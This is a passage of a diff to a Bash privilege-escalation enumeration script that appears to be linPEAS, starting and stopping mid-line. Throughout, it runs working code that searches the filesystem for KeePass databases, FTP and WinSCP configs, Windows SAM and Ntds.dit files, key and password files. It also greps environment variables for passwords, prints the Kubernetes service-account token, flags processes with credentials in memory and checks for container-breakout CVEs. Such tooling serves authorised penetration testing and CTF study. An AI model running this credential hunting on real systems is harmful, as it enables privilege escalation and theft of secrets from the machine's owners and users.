"^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + + + ##### POST SERACH VARIABLES ##### + backup_folders_row="`echo $PSTORAGE_BACKUPS | tr '\n' ' '`" + printf ${YELLOW}"DONE\n"$NC + echo "" +fi + + +if [ "`echo $CHECKS | grep SysI`" ]; then + ########################################### + #-------------) System Info (-------------# + ########################################### + print_title "System Information" + + #-- SY) OS + print_2title "Operative system" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" + (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," + lsb_release -a 2>/dev/null + echo "" + + #-- SY) Sudo + print_2title "Sudo version" + if [ "`command -v sudo 2>/dev/null`" ]; then + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" + sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," + else echo_not_found "sudo" + fi + echo "" + + #--SY) USBCreator + print_2title "USBCreator" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" + if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," + fi + fi + fi + echo "" + + #-- SY) PATH + print_2title "PATH" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" + echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" + echo "" + + #-- SY) Date + print_2title "Date" + date 2>/dev/null || echo_not_found "date" + echo "" + + #-- SY) System stats + print_2title "System stats" + (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" + free 2>/dev/null || echo_not_found "free" + echo "" + + #-- SY) CPU info + print_2title "CPU info" + lscpu 2>/dev/null || echo_not_found "lscpu" + echo "" + + #-- SY) Environment vars + print_2title "Environment" + print_info "Any private information inside environment variables?" + (env || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" + echo "" + + #-- SY) Dmesg + print_2title "Searching Signature verification failed in dmseg" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" + (dmesg 2>/dev/null | grep "signature") || echo_not_found + echo "" + + #-- SY) AppArmor + print_2title "Linux Protections" + print_list "AppArmor enabled? .............. "$NC + if [ `command -v aa-status 2>/dev/null` ]; then + aa-status 2>&1 | sed "s,disabled,${SED_RED}," + elif [ `command -v apparmor_status 2>/dev/null` ]; then + apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," + elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then + ls -d /etc/apparmor* + else + echo_not_found "AppArmor" + fi + + #-- SY) grsecurity + print_list "grsecurity present? ............ "$NC + ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + + #-- SY) PaX + print_list "PaX bins present? .............. "$NC + (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") + + #-- SY) Execshield + print_list "Execshield enabled? ............ "$NC + (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," + + #-- SY) SElinux + print_list "SELinux enabled? ............... "$NC + (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + #-- SY) ASLR + print_list "Is ASLR enabled? ............... "$NC + ASLR=`cat /proc/sys/kernel/randomize_va_space 2>/dev/null` + if [ -z "$ASLR" ]; then + echo_not_found "/proc/sys/kernel/randomize_va_space"; + else + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi + echo "" + fi + + #-- SY) Printer + print_list "Printer? ....................... "$NC + lpstat -a 2>/dev/null || echo_not_found "lpstat" + + #-- SY) Running in a virtual environment + print_list "Is this a virtual machine? ..... "$NC + hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` + if [ `command -v systemd-detect-virt 2>/dev/null` ]; then + detectedvirt=`systemd-detect-virt` + if [ "$hypervisorflag" ]; then printf $RED"Yes ("$detectedvirt")"$NC; else printf $GREEN"No"$NC; fi + else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi + fi + echo "" + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep Container`" ]; then + ############################################## + #---------------) Containers (---------------# + ############################################## + print_title "Containers" + containerCheck + + print_2title "Container related tools present" + command -v $CONTAINER_CMDS + + print_2title "Container details" + print_list "Is this a container? ...........$NC $containerType" + + print_list "Any running containers? ........ "$NC + # Get counts of running containers for each platform + dockercontainers=`docker ps --format "{{.Names}}" 2>/dev/null | wc -l` + podmancontainers=`podman ps --format "{{.Names}}" 2>/dev/null | wc -l` + lxccontainers=`lxc list -c n --format csv 2>/dev/null | wc -l` + rktcontainers=`rkt list 2>/dev/null | tail -n +2 | wc -l` + if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then + echo_no + else + containerCounts="" + if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi + if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi + if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi + if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi + echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + # List any running containers + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi + fi + + #If docker + if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then + print_2title "Docker Container details" + inDockerGroup + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC + enumerateDockerSockets + print_list "Docker version .................$NC$dockerVersion" + checkDockerVersionExploits + print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + fi + fi + + if [ "$inContainer" ]; then + echo "" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC" `cat /etc/hostname` + if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then + print_list "Container Full ID ..............$NC `basename \"$(cat /proc/1/cpuset)\"`\n" + fi + if [ "`echo \"$containerType\" | grep -i \"kubernetes\"`" ]; then + print_list "Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" + print_list "Kubernetes token ...............$NC `cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" + fi + + checkContainerExploits + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + echo "" + + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + echo "" + + print_2title "Privilege Mode" + if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi + else + echo_not_found + fi + echo "" + + print_2title "Interesting Files Mounted" + grep -Ev "$GREP_IGNORE_MOUNTS" /proc/self/mountinfo | cut -d' ' -f 4- + echo "" + + print_2title "Possible Entrypoints" + ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq + echo "" + fi + + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + + +if [ "`echo $CHECKS | grep Devs`" ]; then + ########################################### + #---------------) Devices (---------------# + ########################################### + print_title "Devices" + + #-- 1D) sd in /dev + print_2title "Any sd*/disk* disk in /dev? (limit 20)" + ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 + echo "" + + #-- 2D) Unmounted + print_2title "Unmounted file-system?" + print_info "Check if you can mount umounted devices" + if [ -f "/etc/fstab" ]; then + cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" + else + echo_not_found "/etc/fstab" + fi + echo "" + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep AvaSof`" ]; then + ########################################### + #---------) Available Software (----------# + ########################################### + print_title "Available Software" + + #-- 1AS) Useful software + print_2title "Useful software" + command -v $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null + echo "" + + #-- 2AS) Search for compilers + print_2title "Installed Compiler" + (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + echo "" + echo "" + if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +fi + + +if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then + #################################################### + #-----) Processes & Cron & Services & Timers (-----# + #################################################### + print_title "Processes, Cron, Services, Timers & Sockets" + + #-- PCS) Cleaned proccesses + print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + fi + print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + + if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=`print_ps` + else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then + cpid="`echo \"$psline\" | awk '{print $2}'`" + caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi + done + pslist=`ps auxwww` + echo "" + + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + fi + echo "" + + #-- PCS) Files opened by processes belonging to other users + if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" + fi + + #-- PCS) Processes with credentials inside memory + print_2title "Processes with credentials in memory (root req)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" + if [ "`echo \"$pslist\" | grep \"gdm-password\"`" ]; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if [ "`echo \"$pslist\" | grep \"gnome-keyring-daemon\"`" ]; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if [ "`echo \"$pslist\" | grep \"lightdm\"`" ]; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if [ "`echo \"$pslist\" | grep \"vsftpd\"`" ]; then echo "vsftpd process found (dump creds from memory as 